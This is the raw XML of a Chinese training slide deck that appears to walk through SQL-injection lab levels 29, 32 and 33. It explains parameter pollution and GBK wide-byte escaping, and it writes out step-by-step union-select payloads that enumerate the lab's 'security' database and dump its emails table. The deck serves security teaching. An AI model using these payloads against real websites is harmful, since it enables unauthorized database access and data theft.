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457" r:id="rId3"/>
    <p:sldId id="1394" r:id="rId4"/>
    <p:sldId id="1486" r:id="rId6"/>
    <p:sldId id="1493" r:id="rId7"/>
    <p:sldId id="1487" r:id="rId8"/>
    <p:sldId id="1488" r:id="rId9"/>
  </p:sldIdLst>
  <p:sldSz cx="12192635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6026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1368" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1977"/>
        <p:guide pos="3721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" y="-2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  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3000" b="0" strike="noStrike" spc="-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靶场原理详解（八）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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第二十九关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79376" y="148478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1950" y="2348865"/>
            <a:ext cx="84924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十九题我们其实进去尝试一下就能发现，用单引号和最初讲的联合查询就能简单的做出来，实际这里出题人是希望我们去搭两个环境一个是Tomcat（jsp），一个是apache（php），这边简单跟你们说一下这题的大致思路，首先我们的传参先会经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过滤然后再传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，然后将经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器处理完之后又返回给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器，从而显示到客户端，这里我们可以利用参数污染的方式给他两个传参，他会将第一个传参给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>处理，而第二个传参交给了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>处理，从而绕过了，后面几题差不多就不做过多讲解。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76320" y="4977130"/>
            <a:ext cx="5334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https://www.cooyf.com/notes/4.html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第三十二关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48765" y="1744980"/>
            <a:ext cx="85083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注入输入单引号尝试闭合的时候发现被加上了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>转义掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>于是我们去查看源码，发现他下面确实写了一个简单的过滤，既然这里不能直接闭合我们一般思路就是想办法去掉这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不让他生效，看到他源码下设置了一下编码，突然想到了宽字节绕过，他的原理很简单，就是利用了数据库和页面编码不同的问题，PHP发送请求到mysql时经过一次gbk编码，PHP会将获取到的数据进行魔术引号的处理，因为GBK是双字节编码，所以我们提交的%df这个字符和转译的反斜杠组成了新的汉字，然后数据库处理的时候是根据GBK去处理的，然后单引号就逃逸了出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9900" y="4292600"/>
            <a:ext cx="8481695" cy="14744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第三十二关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28190" y="1736725"/>
            <a:ext cx="75488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判断是否存在注入：?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> %df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>qwe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判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr 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%df</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'order by 3-- qwe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 altLang="en-US"/>
              <a:t>判断显错位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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1,2,3 --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判断库名：?id=10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1,2,3 --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判断表名：?id=10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1,table_name,3 from </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>information_schema.tables where table_schema='security'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判断列名：?id=10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1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'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判断数据：?id=10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1,id,3 from emails-- qwe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第三十三关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704340" y="1268730"/>
            <a:ext cx="8756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题我们尝试发现和前面一关一样是会转义掉我们的单引号，于是查看源码发现这题用到了一个check_addslashes函数，它的作用就是会在引号和反斜杠前添加一个反斜杠转义，做法跟上一题一样，可以利用宽字节的方式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207895" y="2276475"/>
            <a:ext cx="75488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判断是否存在注入：?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> %df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>qwe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判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr 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%df</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'order by 3-- qwe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 altLang="en-US"/>
              <a:t>判断显错位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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1,2,3 --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判断库名：?id=10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1,2,3 --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判断表名：?id=10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1,table_name,3 from </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>information_schema.tables where table_schema='security'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判断列名：?id=10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1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'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判断数据：?id=10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1,id,3 from emails-- qwe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第三十三关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07895" y="1592580"/>
            <a:ext cx="75488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判断是否存在注入：?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> %df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>qwe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判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr 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%df</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'order by 3-- qwe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 altLang="en-US"/>
              <a:t>判断显错位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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1,2,3 --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判断库名：?id=10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1,2,3 --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判断表名：?id=10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1,table_name,3 from </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>information_schema.tables where table_schema='security'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判断列名：?id=10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1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails' -- qwe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判断数据：?id=10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>'union select 1,id,3 from emails-- qwe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850,&quot;width&quot;:16395}"/>
</p:tagLst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2061</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>74</Paragraphs>
  <Slides>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楷体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第二十九关</vt:lpstr>
      <vt:lpstr>第三十二关</vt:lpstr>
      <vt:lpstr>第三十二关</vt:lpstr>
      <vt:lpstr>第三十三关</vt:lpstr>
      <vt:lpstr>第三十三关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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WPS_1602511213</cp:lastModifiedBy>
  <cp:revision>3104</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-24T06:14:24Z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